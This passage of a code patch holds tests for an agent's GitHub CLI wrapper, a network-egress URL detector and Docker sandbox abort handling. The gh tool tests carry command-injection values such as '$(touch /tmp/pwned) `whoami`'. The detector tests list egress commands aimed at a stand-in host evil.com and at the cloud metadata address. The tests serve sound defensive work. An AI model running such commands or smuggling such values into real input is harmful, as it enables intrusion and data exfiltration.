Sandbox, + ); + await vi.advanceTimersByTimeAsync(90_000); + const result = await promise; + + expect(result?.isError).toBe(true); + expect(getTextOutput(result!)).toContain("Command timed out after 90s"); + expect(sandbox.execWithArgs).toHaveBeenNthCalledWith( + 2, + "gh", + ["auth", "status"], + expect.objectContaining({ + signal: expect.any(AbortSignal), + }), + ); + } finally { + vi.useRealTimers(); + } + }); + + it("times out sandbox gh commands even if execWithArgs never settles", async () => { + vi.useFakeTimers(); + try { + const sandbox = { + exec: vi.fn(), + execWithArgs: vi.fn( + ( + _command: string, + _args: string[] = [], + _options?: { signal?: AbortSignal }, + ) => new Promise(() => {}), + ), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + let settled = false; + + const promise = executeGhCommand( + "gh-sandbox-timeout", + ["pr", "checks"], + undefined, + sandbox as unknown as Sandbox, + ).then((result) => { + settled = true; + return result; + }); + + await vi.advanceTimersByTimeAsync(90_000); + await Promise.resolve(); + + expect(settled).toBe(true); + const result = await promise; + + expect(result.isError).toBe(true); + expect(getTextOutput(result)).toContain("Command timed out after 90s"); + expect(sandbox.execWithArgs).toHaveBeenCalledWith( + "gh", + ["pr", "checks"], + expect.objectContaining({ + signal: expect.any(AbortSignal), + }), + ); + } finally { + vi.useRealTimers(); + } + }); + + it("fails closed when sandbox gh probes lack argv execution support", async () => { + const sandbox = { + exec: vi.fn(), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const result = await checkGhCliAvailable( + undefined, + sandbox as unknown as Sandbox, + ); + + expect(result?.isError).toBe(true); + expect(getTextOutput(result!)).toContain( + "require argv-capable sandbox support", + ); + expect(bashToolMock.execute).not.toHaveBeenCalled(); + expect(sandbox.exec).not.toHaveBeenCalled(); + }); + + it("times out sandbox gh probes after the default timeout", async () => { + vi.useFakeTimers(); + try { + const sandbox = { + exec: vi.fn(), + execWithArgs: vi.fn( + ( + _command: string, + _args: string[] = [], + options?: { signal?: AbortSignal }, + ) => + new Promise((resolve) => { + options?.signal?.addEventListener( + "abort", + () => + resolve({ + stdout: "", + stderr: "", + exitCode: 1, + }), + { once: true }, + ); + }), + ), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const promise = checkGhCliAvailable( + undefined, + sandbox as unknown as Sandbox, + ); + await vi.advanceTimersByTimeAsync(90_000); + const result = await promise; + + expect(result?.isError).toBe(true); + expect(getTextOutput(result!)).toContain("Command timed out after 90s"); + expect(getTextOutput(result!)).not.toContain("not installed"); + expect(sandbox.execWithArgs).toHaveBeenCalledTimes(1); + } finally { + vi.useRealTimers(); + } + }); + + it("reports sandbox gh cancellations when the signal aborts during setup", async () => { + const reentrantSignal = { + aborted: false, + reason: new Error("sandbox aborted"), + addEventListener: vi.fn(() => { + reentrantSignal.aborted = true; + }), + removeEventListener: vi.fn(), + } as unknown as AbortSignal; + const sandbox = { + exec: vi.fn(), + execWithArgs: vi.fn( + ( + _command: string, + _args: string[] = [], + options?: { signal?: AbortSignal }, + ) => + options?.signal?.aborted + ? Promise.reject(new Error("sandbox aborted")) + : Promise.resolve({ + stdout: "", + stderr: "", + exitCode: 0, + }), + ), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + }; + + const result = await executeGhCommand( + "gh-sandbox-abort-during-setup", + ["repo", "clone", "owner/repo"], + reentrantSignal, + sandbox as unknown as Sandbox, + ); + + expect(result.isError).toBe(true); + expect(getTextOutput(result)).toContain("Command cancelled"); + }); + + it("caps oversized stdout and reports truncation", async () => { + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + + const promise = executeGhCommand("gh-large-output", ["api", "repos"]); + child.stdout.emit("data", Buffer.from("x".repeat(50 * 1024))); + child.emit("close", 0); + + const result = await promise; + const output = getTextOutput(result); + const capturedOutput = output.split("\n\n")[0] ?? ""; + + expect((capturedOutput.match(/x/g) ?? []).length).toBe(40 * 1024); + expect(output).toContain("stdout exceeded 40KB limit and was truncated"); + }); + + it("preserves isError when rewriting friendly auth failures", async () => { + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + + const promise = executeGhCommand("gh-auth-error", ["pr", "view", "1"]); + child.stderr.emit( + "data", + Buffer.from("gh: not logged in\nRun: gh auth login"), + ); + child.emit("close", 1); + + const result = await promise; + + expect(result.isError).toBe(true); + expect(getTextOutput(result)).toContain("GitHub CLI is not authenticated."); + }); + + it("terminates gh after the default timeout", async () => { + vi.useFakeTimers(); + try { + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + + const promise = executeGhCommand("gh-timeout", ["pr", "checks"]); + await vi.advanceTimersByTimeAsync(90_000); + + expect(shellUtilsMock.killProcessTree).toHaveBeenCalledWith(1234); + expect(child.kill).not.toHaveBeenCalled(); + + child.emit("close", null); + const result = await promise; + + expect(result.isError).toBe(true); + expect(getTextOutput(result)).toContain("Command timed out after 90s"); + } finally { + vi.useRealTimers(); + } + }); + + it("kills the process tree when aborted", async () => { + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + const controller = new AbortController(); + + const promise = executeGhCommand( + "gh-abort", + ["repo", "clone"], + controller.signal, + ); + controller.abort(); + + expect(shellUtilsMock.killProcessTree).toHaveBeenCalledWith(1234); + expect(child.kill).not.toHaveBeenCalled(); + + child.emit("close", null); + const result = await promise; + + expect(result.isError).toBe(true); + expect(getTextOutput(result)).toContain("Command cancelled"); + expect(getTextOutput(result)).not.toContain("Exit code: null"); + }); +}); diff --git a/test/tools/gh.test.ts b/test/tools/gh.test.ts index 0daf89a36..38580687b 100644 --- a/test/tools/gh.test.ts +++ b/test/tools/gh.test.ts @@ -1,14 +1,19 @@ import { describe, expect, it, vi } from "vitest"; +import type { Sandbox } from "../../src/sandbox/types.js"; import { ghIssueTool, ghPrTool, ghRepoTool } from "../../src/tools/gh.js"; +const executeGhCommandMock = vi.hoisted(() => + vi.fn((_id: string, args: string[]) => ({ + content: [{ type: "text", text: `Executed: ${args.join(" ")}` }], + isError: false, + details: { command: args }, + })), +); + // Mock the gh-helpers module to avoid needing actual gh CLI vi.mock("../../src/tools/gh-helpers.js", () => ({ checkGhCliAvailable: vi.fn().mockResolvedValue(null), - executeGhCommand: vi.fn().mockImplementation((_id, cmd) => ({ - content: [{ type: "text", text: `Executed: ${cmd}` }], - isError: false, - details: { command: cmd }, - })), + executeGhCommand: executeGhCommandMock, })); describe("gh PR tool", () => { @@ -151,6 +156,23 @@ describe("gh PR tool", () => { expect(text.text).toContain("name-only"); } }); + + it("passes metacharacter-heavy PR bodies as one argv entry", async () => { + const body = 'body $(touch /tmp/pwned) `whoami` \\ "quoted"'; + + await ghPrTool.execute("gh-pr-metachar", { + action: "create", + title: "Safe title", + body, + }); + + expect(executeGhCommandMock).toHaveBeenLastCalledWith( + "gh-pr-create", + ["pr", "create", "--title", "Safe title", "--body", body], + undefined, + undefined, + ); + }); }); }); @@ -228,6 +250,23 @@ describe("gh Issue tool", () => { expect(text.text).toContain("25"); } }); + + it("passes metacharacter-heavy issue bodies as one argv entry", async () => { + const body = 'issue $(touch /tmp/pwned) `whoami` \\ "quoted"'; + + await ghIssueTool.execute("gh-issue-metachar", { + action: "create", + title: "Safe title", + body, + }); + + expect(executeGhCommandMock).toHaveBeenLastCalledWith( + "gh-issue-create", + ["issue", "create", "--title", "Safe title", "--body", body], + undefined, + undefined, + ); + }); }); }); @@ -274,6 +313,50 @@ describe("gh Repo tool", () => { } }); + it("passes metacharacter-heavy repository names as one argv entry", async () => { + const repository = "owner/repo$(touch /tmp/pwned)`whoami`\\"; + + await ghRepoTool.execute("gh-repo-metachar", { + action: "clone", + repository, + directory: "target", + }); + + expect(executeGhCommandMock).toHaveBeenLastCalledWith( + "gh-repo-clone", + ["repo", "clone", repository, "target"], + undefined, + undefined, + ); + }); + + it("passes sandbox context through to gh execution", async () => { + const sandbox = { + exec: vi.fn(), + readFile: vi.fn(), + writeFile: vi.fn(), + exists: vi.fn(), + dispose: vi.fn(), + } as unknown as Sandbox; + + await ghRepoTool.execute( + "gh-repo-sandbox", + { + action: "clone", + repository: "owner/repo", + }, + undefined, + { sandbox }, + ); + + expect(executeGhCommandMock).toHaveBeenLastCalledWith( + "gh-repo-clone", + ["repo", "clone", "owner/repo"], + undefined, + sandbox, + ); + }); + it("builds fork command", async () => { const result = await ghRepoTool.execute("gh-repo-4", { action: "fork", diff --git a/test/utils/url-extractor.test.ts b/test/utils/url-extractor.test.ts index 39938f388..82022b9f1 100644 --- a/test/utils/url-extractor.test.ts +++ b/test/utils/url-extractor.test.ts @@ -3,6 +3,7 @@ import { extractAllUrls, extractUrlsFromShellCommand, extractUrlsFromValue, + findOpaqueNetworkShellCommand, } from "../../src/utils/url-extractor.js"; describe("extractUrlsFromValue", () => { @@ -134,6 +135,15 @@ describe("extractUrlsFromShellCommand", () => { ]); }); + it("keeps URL operands after curl boolean flags", () => { + expect( + extractUrlsFromShellCommand("curl -i https://example.com"), + ).toEqual(["https://example.com"]); + expect( + extractUrlsFromShellCommand("curl -p https://example.com"), + ).toEqual(["https://example.com"]); + }); + it("extracts URL from curl with flags (includes flag values)", () => { // Note: Flag values like POST are also captured - caller should filter if needed const result = extractUrlsFromShellCommand( @@ -148,6 +158,12 @@ describe("extractUrlsFromShellCommand", () => { ]); }); + it("adds http:// to localhost targets", () => { + expect(extractUrlsFromShellCommand("curl localhost:3000/api")).toEqual([ + "http://localhost:3000/api", + ]); + }); + it("extracts URL from quoted argument", () => { expect( extractUrlsFromShellCommand('curl "https://example.com/path"'), @@ -182,6 +198,16 @@ describe("extractUrlsFromShellCommand", () => { expect(extractUrlsFromShellCommand("echo hello")).toEqual([]); }); + it("ignores URL literals in non-network commands", () => { + expect( + extractUrlsFromShellCommand("echo https://example.com | grep example"), + ).toEqual([]); + expect(extractUrlsFromShellCommand("echo https://evil.com")).toEqual([]); + expect( + extractUrlsFromShellCommand("grep https://evil.com README.md"), + ).toEqual([]); + }); + it("returns empty array for empty string", () => { expect(extractUrlsFromShellCommand("")).toEqual([]); }); @@ -203,6 +229,427 @@ describe("extractUrlsFromShellCommand", () => { expect(extractUrlsFromShellCommand("curl ''")).toEqual([]); }); }); + + describe("network egress commands", () => { + it("extracts netcat host targets", () => { + expect(extractUrlsFromShellCommand("nc 169.254.169.254 80")).toEqual([ + "http://169.254.169.254", + ]); + }); + + it("extracts git HTTPS and scp-style remotes", () => { + expect( + extractUrlsFromShellCommand("git clone https://evil.com/repo.git"), + ).toContain("https://evil.com/repo.git"); + expect( + extractUrlsFromShellCommand("git svn clone https://evil.com/repo.git"), + ).toContain("https://evil.com/repo.git"); + expect( + extractUrlsFromShellCommand("git clone git@evil.com:org/repo.git"), + ).toContain("http://evil.com"); + expect( + extractUrlsFromShellCommand( + "git archive --remote=git@evil.com:org/repo.git HEAD", + ), + ).toContain("http://evil.com"); + expect( + extractUrlsFromShellCommand( + "git submodule add https://evil.com/repo.git vendor/repo", + ), + ).toContain("https://evil.com/repo.git"); + expect( + extractUrlsFromShellCommand( + "git submodule add -b main --name vendored https://evil.com/repo.git vendor/repo", + ), + ).toContain("https://evil.com/repo.git"); + }); + + it("extracts git remotes after global options", () => { + expect( + extractUrlsFromShellCommand( + "git -C /tmp/repo -c core.sshCommand=ssh clone https://evil.com/repo.git", + ), + ).toContain("https://evil.com/repo.git"); + }); + + it("extracts git config URL targets", () => { + expect( + extractUrlsFromShellCommand( + "git config remote.origin.url https://evil.com/repo.git", + ), + ).toContain("https://evil.com/repo.git"); + expect( + extractUrlsFromShellCommand( + 'git config --global url."https://evil.com/".insteadOf https://github.com/', + ), + ).toContain("https://evil.com/"); + }); + + it("extracts git archive remotes from --remote flags", () => { + expect( + extractUrlsFromShellCommand( + "git archive --remote=https://evil.com/repo.git HEAD", + ), + ).toContain("https://evil.com/repo.git"); + expect( + extractUrlsFromShellCommand( + "git archive --remote=git@evil.com:org/repo.git HEAD", + ), + ).toContain("http://evil.com"); + }); + + it("extracts ssh user host targets without a path separator", () => { + expect(extractUrlsFromShellCommand("ssh user@github.com")).toEqual([ + "http://github.com", + ]); + }); + + it("extracts escaped network command names", () => { + expect(extractUrlsFromShellCommand("c\\url http://evil.com")).toEqual([ + "http://evil.com", + ]); + }); + + it("extracts targets behind command wrappers", () => { + expect( + extractUrlsFromShellCommand("busybox wget evil.com/payload"), + ).toEqual(["http://evil.com/payload"]); + expect(extractUrlsFromShellCommand("doas curl evil.com")).toEqual([ + "http://evil.com", + ]); + expect(extractUrlsFromShellCommand("doas -u root curl evil.com")).toEqual( + ["http://evil.com"], + ); + expect(extractUrlsFromShellCommand("sudo curl evil.com")).toEqual([ + "http://evil.com", + ]); + expect(extractUrlsFromShellCommand("time -p curl evil.com")).toEqual([ + "http://evil.com", + ]); + expect(extractUrlsFromShellCommand("timeout 5 curl evil.com")).toEqual([ + "http://evil.com", + ]); + expect( + extractUrlsFromShellCommand("env FOO=bar nc 169.254.169.254 80"), + ).toEqual(["http://169.254.169.254"]); + expect( + extractUrlsFromShellCommand("exec bash -c 'curl evil.com'"), + ).toEqual(["http://evil.com"]); + expect( + extractUrlsFromShellCommand("exec -a worker bash -c 'curl evil.com'"), + ).toEqual(["http://evil.com"]); + expect(extractUrlsFromShellCommand("xargs curl evil.com")).toEqual([ + "http://evil.com", + ]); + }); + + it("extracts targets from find exec commands", () => { + expect( + extractUrlsFromShellCommand("find . -exec curl evil.com \\;"), + ).toEqual(["http://evil.com"]); + }); + + it("extracts targets inside shell -c wrappers", () => { + expect( + extractUrlsFromShellCommand( + 'bash -c "curl evil.com && ssh user@github.com"', + ), + ).toEqual(["http://evil.com", "http://github.com"]); + expect( + extractUrlsFromShellCommand("bash -lc 'nc 169.254.169.254 80'"), + ).toEqual(["http://169.254.169.254"]); + expect(extractUrlsFromShellCommand("bash -ce 'curl evil.com'")).toEqual([ + "http://evil.com", + ]); + expect(extractUrlsFromShellCommand("bash -c'curl evil.com'")).toEqual([ + "http://evil.com", + ]); + expect(extractUrlsFromShellCommand("bash -lc'curl evil.com'")).toEqual([ + "http://evil.com", + ]); + expect( + extractUrlsFromShellCommand("bash -lic 'ssh user@github.com'"), + ).toEqual(["http://github.com"]); + expect( + extractUrlsFromShellCommand("bash --command 'curl evil.com'"), + ).toEqual(["http://evil.com"]); + expect( + extractUrlsFromShellCommand("dash -c 'wget evil.com/payload'"), + ).toEqual(["http://evil.com/payload"]); + expect( + extractUrlsFromShellCommand( + "bash -rcfile /tmp/bashrc -c 'curl evil.com'", + ), + ).toEqual(["http://evil.com"]); + expect( + extractUrlsFromShellCommand("bash -o pipefail -c 'curl evil.com'"), + ).toEqual(["http://evil.com"]); + expect( + extractUrlsFromShellCommand("bash -norc -c 'curl evil.com'"), + ).toEqual(["http://evil.com"]); + }); + + it("extracts targets inside command substitutions", () => { + expect( + extractUrlsFromShellCommand( + "echo $(curl evil.com) $(ssh user@github.com)", + ), + ).toEqual(["http://evil.com", "http://github.com"]); + expect(extractUrlsFromShellCommand("echo $(curl evil.com)")).toEqual([ + "http://evil.com", + ]); + expect( + extractUrlsFromShellCommand("printf '%s' `wget evil.com/payload`"), + ).toEqual(["http://evil.com/payload"]); + }); + + it("extracts targets inside subshell groups", () => { + expect(extractUrlsFromShellCommand("( curl evil.com )")).toEqual([ + "http://evil.com", + ]); + expect(extractUrlsFromShellCommand("echo ok\n( curl evil.com )")).toEqual( + ["http://evil.com"], + ); + expect( + extractUrlsFromShellCommand("echo ok && ( ssh user@github.com )"), + ).toEqual(["http://github.com"]); + }); + + it("extracts targets inside process substitutions", () => { + expect(extractUrlsFromShellCommand("cat <(curl evil.com)")).toEqual([ + "http://evil.com", + ]); + }); + + it("keeps bracketed IPv6 URL hosts intact", () => { + expect(extractUrlsFromShellCommand("curl http://[::1]")).toEqual([ + "http://[::1]", + ]); + }); + }); + + describe("findOpaqueNetworkShellCommand", () => { + it("flags network commands without a statically visible host", () => { + expect(findOpaqueNetworkShellCommand("git fetch origin")).toBe( + "git fetch origin", + ); + expect( + findOpaqueNetworkShellCommand("git fetch origin https://github.com"), + ).toBe("git fetch origin https://github.com"); + expect( + findOpaqueNetworkShellCommand("git remote add origin $REMOTE"), + ).toBe("git remote add origin $REMOTE"); + expect(findOpaqueNetworkShellCommand("sudo git fetch origin")).toBe( + "git fetch origin", + ); + expect(findOpaqueNetworkShellCommand("busybox wget $TARGET")).toBe( + "wget $TARGET", + ); + expect(findOpaqueNetworkShellCommand("doas curl $TARGET")).toBe( + "curl $TARGET", + ); + expect(findOpaqueNetworkShellCommand("doas -u root curl $TARGET")).toBe( + "curl $TARGET", + ); + expect( + findOpaqueNetworkShellCommand( + "git -C /tmp/repo -c foo.bar=baz fetch origin", + ), + ).toBe("git -C /tmp/repo -c foo.bar=baz fetch origin"); + expect(findOpaqueNetworkShellCommand("git lfs fetch origin")).toBe( + "git lfs fetch origin", + ); + expect(findOpaqueNetworkShellCommand("nc $TARGET 80")).toBe( + "nc $TARGET 80", + ); + expect( + findOpaqueNetworkShellCommand("nc $TARGET https://github.com"), + ).toBe("nc $TARGET https://github.com"); + expect(findOpaqueNetworkShellCommand("env nc $TARGET 80")).toBe( + "nc $TARGET 80", + ); + expect(findOpaqueNetworkShellCommand("time -p curl $TARGET")).toBe( + "curl $TARGET", + ); + expect(findOpaqueNetworkShellCommand("timeout 5 curl $TARGET")).toBe( + "curl $TARGET", + ); + expect(findOpaqueNetworkShellCommand('bash -c "git fetch origin"')).toBe( + "git fetch origin", + ); + expect(findOpaqueNetworkShellCommand("bash -ce 'curl $TARGET'")).toBe( + "curl $TARGET", + ); + expect(findOpaqueNetworkShellCommand("bash -c'git fetch origin'")).toBe( + "git fetch origin", + ); + expect( + findOpaqueNetworkShellCommand("bash -lic 'git fetch origin'"), + ).toBe("git fetch origin"); + expect( + findOpaqueNetworkShellCommand("bash --command 'git fetch origin'"), + ).toBe("git fetch origin"); + expect(findOpaqueNetworkShellCommand("dash -c 'git fetch origin'")).toBe( + "git fetch origin", + ); + expect( + findOpaqueNetworkShellCommand( + "bash -rcfile /tmp/bashrc -c 'git fetch origin'", + ), + ).toBe("git fetch origin"); + expect( + findOpaqueNetworkShellCommand("bash -o pipefail -c 'git fetch origin'"), + ).toBe("git fetch origin"); + expect( + findOpaqueNetworkShellCommand("bash -norc -c 'git fetch origin'"), + ).toBe("git fetch origin"); + expect( + findOpaqueNetworkShellCommand("exec bash -c 'git fetch origin'"), + ).toBe("git fetch origin"); + }); + + it("ignores local git archive commands without remote targets", () => { + expect(findOpaqueNetworkShellCommand("git archive HEAD")).toBeNull(); + expect( + findOpaqueNetworkShellCommand("git archive --format=tar HEAD"), + ).toBeNull(); + }); + + it("ignores local git remote bookkeeping commands", () => { + expect(findOpaqueNetworkShellCommand("git remote")).toBeNull(); + expect(findOpaqueNetworkShellCommand("git remote -v")).toBeNull(); + expect( + findOpaqueNetworkShellCommand("git remote remove origin"), + ).toBeNull(); + expect(findOpaqueNetworkShellCommand("git remote rm origin")).toBeNull(); + expect( + findOpaqueNetworkShellCommand("git remote rename origin upstream"), + ).toBeNull(); + expect( + findOpaqueNetworkShellCommand("git remote get-url origin"), + ).toBeNull(); + }); + + it("ignores local git config reads", () => { + expect( + findOpaqueNetworkShellCommand("git config --get remote.origin.url"), + ).toBeNull(); + }); + + it("ignores local git submodule bookkeeping commands", () => { + expect(findOpaqueNetworkShellCommand("git submodule init")).toBeNull(); + expect(findOpaqueNetworkShellCommand("git submodule sync")).toBeNull(); + }); + + it("ignores network commands with extracted targets", () => { + expect(findOpaqueNetworkShellCommand("nc 169.254.169.254 80")).toBeNull(); + expect( + findOpaqueNetworkShellCommand( + "git clone -b main https://example.com/repo target-dir", + ), + ).toBeNull(); + expect( + findOpaqueNetworkShellCommand("git clone https://example.com/repo"), + ).toBeNull(); + expect( + findOpaqueNetworkShellCommand( + "git remote add origin https://example.com/repo.git", + ), + ).toBeNull(); + expect( + findOpaqueNetworkShellCommand( + "git remote set-url origin https://example.com/repo.git", + ), + ).toBeNull(); + expect( + findOpaqueNetworkShellCommand( + "git config remote.origin.url https://example.com/repo.git", + ), + ).toBeNull(); + expect( + findOpaqueNetworkShellCommand( + 'git config --global url."https://example.com/".insteadOf https://github.com/', + ), + ).toBeNull(); + expect( + findOpaqueNetworkShellCommand( + "git archive --remote=https://example.com/repo.git HEAD", + ), + ).toBeNull(); + expect( + findOpaqueNetworkShellCommand( + "git archive --remote=git@example.com:org/repo.git HEAD", + ), + ).toBeNull(); + expect( + findOpaqueNetworkShellCommand("curl https://example.com ./out"), + ).toBeNull(); + expect( + findOpaqueNetworkShellCommand("curl -i https://example.com"), + ).toBeNull(); + expect( + findOpaqueNetworkShellCommand("curl -p https://example.com"), + ).toBeNull(); + expect(findOpaqueNetworkShellCommand("ssh user@github.com")).toBeNull(); + expect(findOpaqueNetworkShellCommand("command -v curl")).toBeNull(); + }); + + it("flags opaque targets inside command substitutions", () => { + expect(findOpaqueNetworkShellCommand("echo $(curl $TARGET)")).toBe( + "curl $TARGET", + ); + expect( + findOpaqueNetworkShellCommand("curl https://example.com $TARGET"), + ).toBe("curl https://example.com $TARGET"); + }); + + it("flags opaque git config URL assignments", () => { + expect( + findOpaqueNetworkShellCommand("git config remote.origin.url $REMOTE"), + ).toBe("git config remote.origin.url $REMOTE"); + expect( + findOpaqueNetworkShellCommand( + 'git config url."$REMOTE".insteadOf https://github.com/', + ), + ).toBe("git config url.$REMOTE.insteadOf https://github.com/"); + }); + + it("flags opaque targets behind xargs and find exec prefixes", () => { + expect(findOpaqueNetworkShellCommand("xargs curl $TARGET")).toBe( + "curl $TARGET", + ); + expect( + findOpaqueNetworkShellCommand("find . -exec curl $TARGET \\;"), + ).toBe("curl $TARGET"); + }); + + it("flags opaque targets inside subshell groups", () => { + expect(findOpaqueNetworkShellCommand("( curl $TARGET )")).toBe( + "curl $TARGET", + ); + }); + + it("flags opaque targets inside process substitutions", () => { + expect(findOpaqueNetworkShellCommand("cat <(curl $TARGET)")).toBe( + "curl $TARGET", + ); + }); + + it("ignores local git clone targets", () => { + expect(findOpaqueNetworkShellCommand("git clone ./repo")).toBeNull(); + expect(findOpaqueNetworkShellCommand("git clone /tmp/repo")).toBeNull(); + expect( + findOpaqueNetworkShellCommand("git clone file:///tmp/repo"), + ).toBeNull(); + }); + + it("ignores local git archive commands without remotes", () => { + expect(findOpaqueNetworkShellCommand("git archive HEAD")).toBeNull(); + expect( + findOpaqueNetworkShellCommand("git archive --format=tar v1.0"), + ).toBeNull(); + }); + }); }); describe("extractAllUrls", () => { From 610758ac5a70990a23a50a0f03bf748bbf75fb73 Mon Sep 17 00:00:00 2001 From: Cursor Agent Date: Fri, 12 Jun 2026 00:07:13 +0000 Subject: [PATCH 2/4] fix: forward docker sandbox aborts --- src/sandbox/docker-sandbox.ts | 92 +++++++++++++++++++++++- test/sandbox/docker-sandbox.test.ts | 105 +++++++++++++++++++++++++++- 2 files changed, 194 insertions(+), 3 deletions(-) diff --git a/src/sandbox/docker-sandbox.ts b/src/sandbox/docker-sandbox.ts index 7f0c7fa46..e32f49bd8 100644 --- a/src/sandbox/docker-sandbox.ts +++ b/src/sandbox/docker-sandbox.ts @@ -68,8 +68,14 @@ const logger = createLogger("sandbox:docker"); const execAsync = promisify(exec); const EXEC_WITH_ARGS_MAX_BUFFER = 1024 * 1024; +const DOCKER_ABORT_MARKER_ENV = "MAESTRO_DOCKER_ABORT_MARKER"; const DOCKER_ABORTABLE_EXEC_WRAPPER = ` child_pid="" +cleanup() { + if [ -n "$${DOCKER_ABORT_MARKER_ENV}" ]; then + rm -f "$${DOCKER_ABORT_MARKER_ENV}" + fi +} on_signal() { if [ -n "$child_pid" ]; then kill -TERM -- "-$child_pid" 2>/dev/null || kill -TERM "$child_pid" 2>/dev/null || true @@ -77,6 +83,7 @@ on_signal() { fi exit 143 } +trap cleanup EXIT trap on_signal TERM INT HUP if command -v setsid >/dev/null 2>&1; then setsid "$@" & @@ -84,6 +91,9 @@ else "$@" & fi child_pid=$! +if [ -n "$${DOCKER_ABORT_MARKER_ENV}" ]; then + printf '%s\n' "$child_pid" > "$${DOCKER_ABORT_MARKER_ENV}" +fi wait "$child_pid" `.trim(); @@ -127,6 +137,53 @@ export class DockerSandbox implements Sandbox { return this.containerId; } + private async killAbortableExec( + containerId: string, + abortMarkerPath: string, + ): Promise { + const killScript = [ + `marker_path="${abortMarkerPath}"`, + "for _ in 1 2 3 4 5 6 7 8 9 10; do", + '\tif [ -f "$marker_path" ]; then', + "\t\tbreak", + "\tfi", + "\tsleep 0.1", + "done", + 'if [ -f "$marker_path" ]; then', + '\tchild_pid=$(cat "$marker_path")', + '\tkill -TERM -- "-$child_pid" 2>/dev/null || kill -TERM "$child_pid" 2>/dev/null || true', + "fi", + ].join("\n"); + + await new Promise((resolve) => { + const killChild = spawn( + "docker", + ["exec", containerId, "sh", "-lc", killScript], + { + stdio: "ignore", + }, + ); + killChild.on("close", (code) => { + if (code && code !== 0) { + logger.debug("Docker abort cleanup exited non-zero", { + containerId, + abortMarkerPath, + exitCode: code, + }); + } + resolve(); + }); + killChild.on("error", (error) => { + logger.debug("Failed to forward abort to docker exec", { + containerId, + abortMarkerPath, + error: error instanceof Error ? error.message : String(error), + }); + resolve(); + }); + }); + } + async exec( command: string, cwd?: string, @@ -135,6 +192,14 @@ export class DockerSandbox implements Sandbox { ): Promise { const id = await this.ensureContainer(); + if (signal) { + return this.execWithArgs("sh", ["-c", command], { + cwd, + env, + signal, + }); + } + let dockerCmd = "docker exec"; if (cwd) { dockerCmd += ` -w "${cwd}"`; @@ -171,6 +236,9 @@ export class DockerSandbox implements Sandbox { try { const id = await this.ensureContainer(); const dockerArgs = ["exec"]; + const abortMarkerPath = options.signal + ? `/tmp/maestro-docker-abort-${randomUUID()}.pid` + : null; if (options.cwd) { dockerArgs.push("-w", options.cwd); } @@ -179,6 +247,9 @@ export class DockerSandbox implements Sandbox { dockerArgs.push("-e", `${key}=${value}`); } } + if (abortMarkerPath) { + dockerArgs.push("-e", `${DOCKER_ABORT_MARKER_ENV}=${abortMarkerPath}`); + } if (options.signal) { dockerArgs.push( id, @@ -195,12 +266,29 @@ export class DockerSandbox implements Sandbox { return await new Promise((resolve, reject) => { const child = spawn("docker", dockerArgs, { - signal: options.signal, stdio: ["ignore", "pipe", "pipe"], }); const maxBuffer = options.maxBuffer ?? EXEC_WITH_ARGS_MAX_BUFFER; const stdoutCapture = createOutputCapture(); const stderrCapture = createOutputCapture(); + let abortForwarded = false; + const forwardAbort = (): void => { + if (!abortMarkerPath || abortForwarded) { + return; + } + abortForwarded = true; + void this.killAbortableExec(id, abortMarkerPath); + }; + const cleanupAbort = (): void => { + options.signal?.removeEventListener("abort", forwardAbort); + }; + + options.signal?.addEventListener("abort", forwardAbort, { + once: true, + }); + if (options.signal?.aborted) { + forwardAbort(); + } child.stdout?.on("data", (data: Buffer) => { appendCapturedOutput(stdoutCapture, data, maxBuffer); @@ -209,6 +297,7 @@ export class DockerSandbox implements Sandbox { appendCapturedOutput(stderrCapture, data, maxBuffer); }); child.on("close", (code) => { + cleanupAbort(); resolve({ stdout: finalizeCapturedOutput(stdoutCapture), stderr: finalizeCapturedOutput(stderrCapture), @@ -216,6 +305,7 @@ export class DockerSandbox implements Sandbox { }); }); child.on("error", (error) => { + cleanupAbort(); const execError = error as Error & { stdout?: string; stderr?: string; diff --git a/test/sandbox/docker-sandbox.test.ts b/test/sandbox/docker-sandbox.test.ts index 486e23e68..0009c001f 100644 --- a/test/sandbox/docker-sandbox.test.ts +++ b/test/sandbox/docker-sandbox.test.ts @@ -13,12 +13,14 @@ import { DockerSandbox } from "../../src/sandbox/docker-sandbox.js"; type MockChildProcess = EventEmitter & { stdout: EventEmitter; stderr: EventEmitter; + kill: ReturnType; }; function createMockChildProcess(): MockChildProcess { const child = new EventEmitter() as MockChildProcess; child.stdout = new EventEmitter(); child.stderr = new EventEmitter(); + child.kill = vi.fn(); return child; } @@ -46,7 +48,6 @@ describe("DockerSandbox", () => { "docker", ["exec", "container-id", "gh", "api"], { - signal: undefined, stdio: ["ignore", "pipe", "pipe"], }, ); @@ -77,7 +78,6 @@ describe("DockerSandbox", () => { "docker", ["exec", "container-123", "gh", "pr", "view", "1"], { - signal: undefined, stdio: ["ignore", "pipe", "pipe"], }, ); @@ -131,6 +131,10 @@ describe("DockerSandbox", () => { "docker", [ "exec", + "-e", + expect.stringMatching( + /^MAESTRO_DOCKER_ABORT_MARKER=\/tmp\/maestro-docker-abort-[0-9a-f-]+\.pid$/, + ), "container-789", "sh", "-lc", @@ -141,8 +145,105 @@ describe("DockerSandbox", () => { "clone", "owner/repo", ], + { + stdio: ["ignore", "pipe", "pipe"], + }, + ); + }); + + it("forwards aborts to the in-container process group", async () => { + const child = createMockChildProcess(); + const abortChild = createMockChildProcess(); + childProcessMock.spawn + .mockReturnValueOnce(child) + .mockReturnValueOnce(abortChild); + const sandbox = new DockerSandbox(); + (sandbox as unknown as { containerId: string | null }).containerId = + "container-abort"; + const controller = new AbortController(); + + const promise = sandbox.execWithArgs( + "gh", + ["repo", "clone", "owner/repo"], { signal: controller.signal, + }, + ); + await Promise.resolve(); + controller.abort(); + await Promise.resolve(); + abortChild.emit("close", 0); + child.stderr.emit("data", Buffer.from("terminated")); + child.emit("close", 143); + + await expect(promise).resolves.toEqual({ + stdout: "", + stderr: "terminated", + exitCode: 143, + }); + expect(childProcessMock.spawn).toHaveBeenNthCalledWith( + 2, + "docker", + [ + "exec", + "container-abort", + "sh", + "-lc", + 